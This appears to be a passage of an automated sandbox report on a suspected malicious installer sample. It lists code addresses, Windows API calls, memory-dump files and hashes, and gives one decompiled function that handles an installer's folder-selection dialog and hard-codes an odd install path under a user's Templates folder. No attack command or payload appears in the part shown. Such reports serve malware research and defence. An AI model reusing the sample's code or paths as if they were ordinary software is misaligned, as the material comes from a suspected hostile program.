                                                                                                                                                                                      0x00405232
                                                                                                                                                                                      0x00405234
                                                                                                                                                                                      0x00405234
                                                                                                                                                                                      0x00405235
                                                                                                                                                                                      0x00405236
                                                                                                                                                                                      0x00405238
                                                                                                                                                                                      0x00405238
                                                                                                                                                                                      0x00405240
                                                                                                                                                                                      0x00405281
                                                                                                                                                                                      0x00405283
                                                                                                                                                                                      0x00405293
                                                                                                                                                                                      0x00405296
                                                                                                                                                                                      0x0040529b
                                                                                                                                                                                      0x004052a2
                                                                                                                                                                                      0x004052a5
                                                                                                                                                                                      0x00405347
                                                                                                                                                                                      0x0040534d
                                                                                                                                                                                      0x0040535b
                                                                                                                                                                                      0x0040536c
                                                                                                                                                                                      0x0040536c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040535b
                                                                                                                                                                                      0x004052ab
                                                                                                                                                                                      0x004052ae
                                                                                                                                                                                      0x004052b4
                                                                                                                                                                                      0x004052b9
                                                                                                                                                                                      0x004052bb
                                                                                                                                                                                      0x004052bd
                                                                                                                                                                                      0x004052c3
                                                                                                                                                                                      0x004052ca
                                                                                                                                                                                      0x004052cf
                                                                                                                                                                                      0x004052d6
                                                                                                                                                                                      0x004052d9
                                                                                                                                                                                      0x004052d9
                                                                                                                                                                                      0x004052e0
                                                                                                                                                                                      0x004052ec
                                                                                                                                                                                      0x004052f0
                                                                                                                                                                                      0x004052f2
                                                                                                                                                                                      0x004052f2
                                                                                                                                                                                      0x004052e2
                                                                                                                                                                                      0x004052e4
                                                                                                                                                                                      0x004052e4
                                                                                                                                                                                      0x00405312
                                                                                                                                                                                      0x0040531e
                                                                                                                                                                                      0x0040532d
                                                                                                                                                                                      0x0040532d
                                                                                                                                                                                      0x0040532f
                                                                                                                                                                                      0x00405332
                                                                                                                                                                                      0x0040533b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405242
                                                                                                                                                                                      0x0040524d
                                                                                                                                                                                      0x00405250
                                                                                                                                                                                      0x00405255
                                                                                                                                                                                      0x00405257
                                                                                                                                                                                      0x0040525b
                                                                                                                                                                                      0x0040526b
                                                                                                                                                                                      0x00405275
                                                                                                                                                                                      0x00405277
                                                                                                                                                                                      0x0040527a
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040525d
                                                                                                                                                                                      0x0040525d
                                                                                                                                                                                      0x00405263
                                                                                                                                                                                      0x00405265
                                                                                                                                                                                      0x00405265
                                                                                                                                                                                      0x00405266
                                                                                                                                                                                      0x00405267
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040525d
                                                                                                                                                                                      0x00405240
                                                                                                                                                                                      0x0040521b
                                                                                                                                                                                      0x0040515e
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405174
                                                                                                                                                                                      0x0040517e
                                                                                                                                                                                      0x00405183
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405195
                                                                                                                                                                                      0x0040519a
                                                                                                                                                                                      0x004051a6
                                                                                                                                                                                      0x004051a6
                                                                                                                                                                                      0x004051a8
                                                                                                                                                                                      0x004051b7
                                                                                                                                                                                      0x004051b9
                                                                                                                                                                                      0x004051bd
                                                                                                                                                                                      0x004051c0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004051c0
                                                                                                                                                                                      0x0040515e
                                                                                                                                                                                      0x00404e1e
                                                                                                                                                                                      0x00404e23
                                                                                                                                                                                      0x00404e2c
                                                                                                                                                                                      0x00404e33
                                                                                                                                                                                      0x00404e41
                                                                                                                                                                                      0x00404e4c
                                                                                                                                                                                      0x00404e52
                                                                                                                                                                                      0x00404e60
                                                                                                                                                                                      0x00404e74
                                                                                                                                                                                      0x00404e79
                                                                                                                                                                                      0x00404e86
                                                                                                                                                                                      0x00404e8b
                                                                                                                                                                                      0x00404ea1
                                                                                                                                                                                      0x00404eb2
                                                                                                                                                                                      0x00404ebf
                                                                                                                                                                                      0x00404ebf
                                                                                                                                                                                      0x00404ec2
                                                                                                                                                                                      0x00404ec8
                                                                                                                                                                                      0x00404eca
                                                                                                                                                                                      0x00404ecd
                                                                                                                                                                                      0x00404ed2
                                                                                                                                                                                      0x00404ed7
                                                                                                                                                                                      0x00404ed9
                                                                                                                                                                                      0x00404ed9
                                                                                                                                                                                      0x00404ef9
                                                                                                                                                                                      0x00404ef9
                                                                                                                                                                                      0x00404efb
                                                                                                                                                                                      0x00404efc
                                                                                                                                                                                      0x00404f01
                                                                                                                                                                                      0x00404f04
                                                                                                                                                                                      0x00404f07
                                                                                                                                                                                      0x00404f0b
                                                                                                                                                                                      0x00404f10
                                                                                                                                                                                      0x00404f15
                                                                                                                                                                                      0x00404f19
                                                                                                                                                                                      0x00404f1e
                                                                                                                                                                                      0x00404f23
                                                                                                                                                                                      0x00404f25
                                                                                                                                                                                      0x00404f2d
                                                                                                                                                                                      0x00404ff8
                                                                                                                                                                                      0x0040500b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404f33
                                                                                                                                                                                      0x00404f36
                                                                                                                                                                                      0x00404f39
                                                                                                                                                                                      0x00404f3c
                                                                                                                                                                                      0x00404f3c
                                                                                                                                                                                      0x00404f43
                                                                                                                                                                                      0x00404f49
                                                                                                                                                                                      0x00404f4c
                                                                                                                                                                                      0x00404f52
                                                                                                                                                                                      0x00404f53
                                                                                                                                                                                      0x00404f58
                                                                                                                                                                                      0x00404f61
                                                                                                                                                                                      0x00404f68
                                                                                                                                                                                      0x00404f6b
                                                                                                                                                                                      0x00404f6e
                                                                                                                                                                                      0x00404f71
                                                                                                                                                                                      0x00404fad
                                                                                                                                                                                      0x00404fd6
                                                                                                                                                                                      0x00404faf
                                                                                                                                                                                      0x00404fbc
                                                                                                                                                                                      0x00404fbc
                                                                                                                                                                                      0x00404f73
                                                                                                                                                                                      0x00404f76
                                                                                                                                                                                      0x00404f85
                                                                                                                                                                                      0x00404f8f
                                                                                                                                                                                      0x00404f97
                                                                                                                                                                                      0x00404f9e
                                                                                                                                                                                      0x00404fa6
                                                                                                                                                                                      0x00404fa6
                                                                                                                                                                                      0x00404f71
                                                                                                                                                                                      0x00404fdc
                                                                                                                                                                                      0x00404fdd
                                                                                                                                                                                      0x00404fe9
                                                                                                                                                                                      0x00404fe9
                                                                                                                                                                                      0x00404ff6
                                                                                                                                                                                      0x00405011
                                                                                                                                                                                      0x00405015
                                                                                                                                                                                      0x00405032
                                                                                                                                                                                      0x00405037
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00405017
                                                                                                                                                                                      0x0040501c
                                                                                                                                                                                      0x00405025
                                                                                                                                                                                      0x004053af
                                                                                                                                                                                      0x004053c1
                                                                                                                                                                                      0x004053c1
                                                                                                                                                                                      0x00405015
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404ff6
                                                                                                                                                                                      0x00404f2d

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.2038317918.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038409916.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038452317.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038631051.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038667231.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038701322.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038736487.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038809047.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038840995.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038879039.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038911972.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2038945906.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039260955.00000000004A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039305161.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000000.00000002.2039403642.00000000004BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Aposporogony.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                      • String ID: $M$N
                                                                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                                                                      • Opcode ID: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                                                                                      • Instruction ID: 7f687e55a7f93217ddba54fde82f382d197ef8b4c31ab339cf60f2545021b201
                                                                                                                                                                                      • Opcode Fuzzy Hash: fb644b25ca39ae204efa7e1d1243337108994715b0d322cb34e58838b66aab8b
                                                                                                                                                                                      • Instruction Fuzzy Hash: DD028DB0A00609EFDF209F94CD85AAE7BB5FB44354F10807AE611BA2E0C7798D52CF58
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 78%
                                                                                                                                                                                      			E00404850(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                      				signed int _v12;
                                                                                                                                                                                      				long _v16;
                                                                                                                                                                                      				long _v20;
                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				long _v36;
                                                                                                                                                                                      				char _v40;
                                                                                                                                                                                      				unsigned int _v44;
                                                                                                                                                                                      				signed int _v48;
                                                                                                                                                                                      				WCHAR* _v56;
                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                      				intOrPtr _v68;
                                                                                                                                                                                      				WCHAR* _v72;
                                                                                                                                                                                      				void _v76;
                                                                                                                                                                                      				struct HWND__* _v80;
                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                      				intOrPtr _t82;
                                                                                                                                                                                      				long _t87;
                                                                                                                                                                                      				short* _t89;
                                                                                                                                                                                      				void* _t95;
                                                                                                                                                                                      				signed int _t96;
                                                                                                                                                                                      				int _t109;
                                                                                                                                                                                      				signed short _t114;
                                                                                                                                                                                      				signed int _t118;
                                                                                                                                                                                      				struct HWND__** _t122;
                                                                                                                                                                                      				intOrPtr* _t138;
                                                                                                                                                                                      				WCHAR* _t146;
                                                                                                                                                                                      				unsigned int _t150;
                                                                                                                                                                                      				signed int _t152;
                                                                                                                                                                                      				unsigned int _t156;
                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                      				signed int* _t159;
                                                                                                                                                                                      				signed int* _t160;
                                                                                                                                                                                      				struct HWND__* _t166;
                                                                                                                                                                                      				struct HWND__* _t167;
                                                                                                                                                                                      				int _t169;
                                                                                                                                                                                      				unsigned int _t197;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t156 = __edx;
                                                                                                                                                                                      				_t82 =  *0x422700; // 0x6fcc74
                                                                                                                                                                                      				_v32 = _t82;
                                                                                                                                                                                      				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                                                                                                                                                                                      				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                                                                                      				if(_a8 == 0x40b) {
                                                                                                                                                                                      					E00405A32(0x3fb, _t146);
                                                                                                                                                                                      					E0040667C(_t146);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t167 = _a4;
                                                                                                                                                                                      				if(_a8 != 0x110) {
                                                                                                                                                                                      					L8:
                                                                                                                                                                                      					if(_a8 != 0x111) {
                                                                                                                                                                                      						L20:
                                                                                                                                                                                      						if(_a8 == 0x40f) {
                                                                                                                                                                                      							L22:
                                                                                                                                                                                      							_v8 = _v8 & 0x00000000;
                                                                                                                                                                                      							_v12 = _v12 & 0x00000000;
                                                                                                                                                                                      							E00405A32(0x3fb, _t146);
                                                                                                                                                                                      							if(E00405DC5(_t186, _t146) == 0) {
                                                                                                                                                                                      								_v8 = 1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							E004063E8(0x4216f8, _t146);
                                                                                                                                                                                      							_t87 = E004067C2(1);
                                                                                                                                                                                      							_v16 = _t87;
                                                                                                                                                                                      							if(_t87 == 0) {
                                                                                                                                                                                      								L30:
                                                                                                                                                                                      								E004063E8(0x4216f8, _t146);
                                                                                                                                                                                      								_t89 = E00405D68(0x4216f8);
                                                                                                                                                                                      								_t158 = 0;
                                                                                                                                                                                      								if(_t89 != 0) {
                                                                                                                                                                                      									 *_t89 = 0;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(GetDiskFreeSpaceW(0x4216f8,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                                                                                      									goto L35;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									_t169 = 0x400;
                                                                                                                                                                                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                                                                                      									asm("cdq");
                                                                                                                                                                                      									_v48 = _t109;
                                                                                                                                                                                      									_v44 = _t156;
                                                                                                                                                                                      									_v12 = 1;
                                                                                                                                                                                      									goto L36;
                                                                                                                                                                                      								}
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t159 = 0;
                                                                                                                                                                                      								if(0 == 0x4216f8) {
                                                                                                                                                                                      									goto L30;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									goto L26;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									L26:
                                                                                                                                                                                      									_t114 = _v16(0x4216f8,  &_v48,  &_v28,  &_v40);
                                                                                                                                                                                      									if(_t114 != 0) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									if(_t159 != 0) {
                                                                                                                                                                                      										 *_t159 =  *_t159 & _t114;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t160 = E00405D09(0x4216f8);
                                                                                                                                                                                      									 *_t160 =  *_t160 & 0x00000000;
                                                                                                                                                                                      									_t159 = _t160;
                                                                                                                                                                                      									 *_t159 = 0x5c;
                                                                                                                                                                                      									if(_t159 != 0x4216f8) {
                                                                                                                                                                                      										continue;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L30;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t150 = _v44;
                                                                                                                                                                                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                                                                                                      								_v44 = _t150 >> 0xa;
                                                                                                                                                                                      								_v12 = 1;
                                                                                                                                                                                      								_t158 = 0;
                                                                                                                                                                                      								__eflags = 0;
                                                                                                                                                                                      								L35:
                                                                                                                                                                                      								_t169 = 0x400;
                                                                                                                                                                                      								L36:
                                                                                                                                                                                      								_t95 = E00404CED(5);
                                                                                                                                                                                      								if(_v12 != _t158) {
                                                                                                                                                                                      									_t197 = _v44;
                                                                                                                                                                                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                                                                                                      										_v8 = 2;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if( *((intOrPtr*)( *0x42921c + 0x10)) != _t158) {
                                                                                                                                                                                      									E00404CD5(0x3ff, 0xfffffffb, _t95);
                                                                                                                                                                                      									if(_v12 == _t158) {
                                                                                                                                                                                      										SetDlgItemTextW(_a4, _t169, 0x4216e8);
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										E00404C0C(_t169, 0xfffffffc, _v48, _v44);
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t96 = _v8;
                                                                                                                                                                                      								 *0x42a304 = _t96;
                                                                                                                                                                                      								if(_t96 == _t158) {
                                                                                                                                                                                      									_v8 = E0040140B(7);
                                                                                                                                                                                      								}
                                                                                                                                                                                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                                                                                                                      									_v8 = _t158;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								E00404381(0 | _v8 == _t158);
                                                                                                                                                                                      								if(_v8 == _t158 &&  *0x423718 == _t158) {
                                                                                                                                                                                      									E004047A9();
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *0x423718 = _t158;
                                                                                                                                                                                      								goto L53;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t186 = _a8 - 0x405;
                                                                                                                                                                                      						if(_a8 != 0x405) {
                                                                                                                                                                                      							goto L53;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_t118 = _a12 & 0x0000ffff;
                                                                                                                                                                                      					if(_t118 != 0x3fb) {
                                                                                                                                                                                      						L12:
                                                                                                                                                                                      						if(_t118 == 0x3e9) {
                                                                                                                                                                                      							_t152 = 7;
                                                                                                                                                                                      							memset( &_v76, 0, _t152 << 2);
                                                                                                                                                                                      							_v80 = _t167;
                                                                                                                                                                                      							_v72 = 0x423728;
                                                                                                                                                                                      							_v60 = E00404BA6;
                                                                                                                                                                                      							_v56 = _t146;
                                                                                                                                                                                      							_v68 = E0040640A(_t146, 0x423728, _t167, 0x421f00, _v12);
                                                                                                                                                                                      							_t122 =  &_v80;
                                                                                                                                                                                      							_v64 = 0x41;
                                                                                                                                                                                      							__imp__SHBrowseForFolderW(_t122);
                                                                                                                                                                                      							if(_t122 == 0) {
                                                                                                                                                                                      								_a8 = 0x40f;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								__imp__CoTaskMemFree(_t122);
                                                                                                                                                                                      								E00405CBD(_t146);
                                                                                                                                                                                      								_t125 =  *((intOrPtr*)( *0x42a254 + 0x11c));
                                                                                                                                                                                      								if( *((intOrPtr*)( *0x42a254 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Ogtiern\\Hamiltonianism") {
                                                                                                                                                                                      									E0040640A(_t146, 0x423728, _t167, 0, _t125);
                                                                                                                                                                                      									if(lstrcmpiW(0x4281e0, 0x423728) != 0) {
                                                                                                                                                                                      										lstrcatW(_t146, 0x4281e0);
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      								 *0x423718 =  *0x423718 + 1;
                                                                                                                                                                                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_a12 >> 0x10 != 0x300) {
                                                                                                                                                                                      						goto L53;
                                                                                                                                                                                      					}
                                                                                                                                                                                      					_a8 = 0x40f;
                                                                                                                                                                                      					goto L12;
                                                                                                                                                                                      				} else {
                                                                                                                                                                                      					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                                                                                                                      					if(E00405D34(_t146) != 0 && E00405D68(_t146) == 0) {
                                                                                                                                                                                      						E00405CBD(_t146);
                                                                                                                                                                                      					}
                                                                                                                                                                                      					 *0x429218 = _t167;
                                                                                                                                                                                      					SetWindowTextW(_t166, _t146);
                                                                                                                                                                                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                                                                                                                                                      					_push(1);
                                                                                                                                                                                      					E0040435F(_t167);
                                                                                                                                                                                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                                                                                                      					_push(0x14);
                                                                                                                                                                                      					E0040435F(_t167);
                                                                                                                                                                                      					E00404394(_t166);
                                                                                                                                                                                      					_t138 = E004067C2(7);
                                                                                                                                                                                      					if(_t138 == 0) {
                                                                                                                                                                                      						L53:
                                                                                                                                                                                      						return E004043C6(_a8, _a12, _a16);
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						 *_t138(_t166, 1);
                                                                                                                                                                                      						goto L8;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      			}













































                                                                                                                                                                                      0x00404850
                                                                                                                                                                                      0x00404856
                                                                                                                                                                                      0x0040485c
                                                                                                                                                                                      0x00404869
                                                                                                                                                                                      0x00404877
                                                                                                                                                                                      0x0040487a
                                                                                                                                                                                      0x00404882
                                                                                                                                                                                      0x00404888
                                                                                                                                                                                      0x00404888
                                                                                                                                                                                      0x00404894
                                                                                                                                                                                      0x00404897
                                                                                                                                                                                      0x00404905
                                                                                                                                                                                      0x0040490c
                                                                                                                                                                                      0x004049e3
                                                                                                                                                                                      0x004049ea
                                                                                                                                                                                      0x004049f9
                                                                                                                                                                                      0x004049f9
                                                                                                                                                                                      0x004049fd
                                                                                                                                                                                      0x00404a07
                                                                                                                                                                                      0x00404a14
                                                                                                                                                                                      0x00404a16
                                                                                                                                                                                      0x00404a16
                                                                                                                                                                                      0x00404a24
                                                                                                                                                                                      0x00404a2b
                                                                                                                                                                                      0x00404a32
                                                                                                                                                                                      0x00404a35
                                                                                                                                                                                      0x00404a71
                                                                                                                                                                                      0x00404a73
                                                                                                                                                                                      0x00404a79
                                                                                                                                                                                      0x00404a7e
                                                                                                                                                                                      0x00404a82
                                                                                                                                                                                      0x00404a84
                                                                                                                                                                                      0x00404a84
                                                                                                                                                                                      0x00404aa0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404aa2
                                                                                                                                                                                      0x00404aa5
                                                                                                                                                                                      0x00404ab3
                                                                                                                                                                                      0x00404ab9
                                                                                                                                                                                      0x00404aba
                                                                                                                                                                                      0x00404abd
                                                                                                                                                                                      0x00404ac0
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404ac0
                                                                                                                                                                                      0x00404a37
                                                                                                                                                                                      0x00404a39
                                                                                                                                                                                      0x00404a3d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404a3f
                                                                                                                                                                                      0x00404a3f
                                                                                                                                                                                      0x00404a4c
                                                                                                                                                                                      0x00404a51
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404a55
                                                                                                                                                                                      0x00404a57
                                                                                                                                                                                      0x00404a57
                                                                                                                                                                                      0x00404a60
                                                                                                                                                                                      0x00404a62
                                                                                                                                                                                      0x00404a67
                                                                                                                                                                                      0x00404a6a
                                                                                                                                                                                      0x00404a6f
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404a6f
                                                                                                                                                                                      0x00404acc
                                                                                                                                                                                      0x00404ad6
                                                                                                                                                                                      0x00404ad9
                                                                                                                                                                                      0x00404adc
                                                                                                                                                                                      0x00404ae3
                                                                                                                                                                                      0x00404ae3
                                                                                                                                                                                      0x00404ae5
                                                                                                                                                                                      0x00404ae5
                                                                                                                                                                                      0x00404aea
                                                                                                                                                                                      0x00404aec
                                                                                                                                                                                      0x00404af4
                                                                                                                                                                                      0x00404afb
                                                                                                                                                                                      0x00404afd
                                                                                                                                                                                      0x00404b08
                                                                                                                                                                                      0x00404b08
                                                                                                                                                                                      0x00404afd
                                                                                                                                                                                      0x00404b18
                                                                                                                                                                                      0x00404b22
                                                                                                                                                                                      0x00404b2a
                                                                                                                                                                                      0x00404b45
                                                                                                                                                                                      0x00404b2c
                                                                                                                                                                                      0x00404b35
                                                                                                                                                                                      0x00404b35
                                                                                                                                                                                      0x00404b2a
                                                                                                                                                                                      0x00404b4a
                                                                                                                                                                                      0x00404b4f
                                                                                                                                                                                      0x00404b54
                                                                                                                                                                                      0x00404b5d
                                                                                                                                                                                      0x00404b5d
                                                                                                                                                                                      0x00404b66
                                                                                                                                                                                      0x00404b68
                                                                                                                                                                                      0x00404b68
                                                                                                                                                                                      0x00404b74
                                                                                                                                                                                      0x00404b7c
                                                                                                                                                                                      0x00404b86
                                                                                                                                                                                      0x00404b86
                                                                                                                                                                                      0x00404b8b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404b8b
                                                                                                                                                                                      0x00404a35
                                                                                                                                                                                      0x004049ec
                                                                                                                                                                                      0x004049f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004049f3
                                                                                                                                                                                      0x00404912
                                                                                                                                                                                      0x0040491b
                                                                                                                                                                                      0x00404935
                                                                                                                                                                                      0x0040493a
                                                                                                                                                                                      0x00404944
                                                                                                                                                                                      0x0040494b
                                                                                                                                                                                      0x00404957
                                                                                                                                                                                      0x0040495a
                                                                                                                                                                                      0x0040495d
                                                                                                                                                                                      0x00404964
                                                                                                                                                                                      0x0040496c
                                                                                                                                                                                      0x0040496f
                                                                                                                                                                                      0x00404973
                                                                                                                                                                                      0x0040497a
                                                                                                                                                                                      0x00404982
                                                                                                                                                                                      0x004049dc
                                                                                                                                                                                      0x00404984
                                                                                                                                                                                      0x00404985
                                                                                                                                                                                      0x0040498c
                                                                                                                                                                                      0x00404996
                                                                                                                                                                                      0x0040499e
                                                                                                                                                                                      0x004049ab
                                                                                                                                                                                      0x004049bf
                                                                                                                                                                                      0x004049c3
                                                                                                                                                                                      0x004049c3
                                                                                                                                                                                      0x004049bf
                                                                                                                                                                                      0x004049c8
                                                                                                                                                                                      0x004049d5
                                                                                                                                                                                      0x004049d5
                                                                                                                                                                                      0x00404982
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040493a
                                                                                                                                                                                      0x00404928
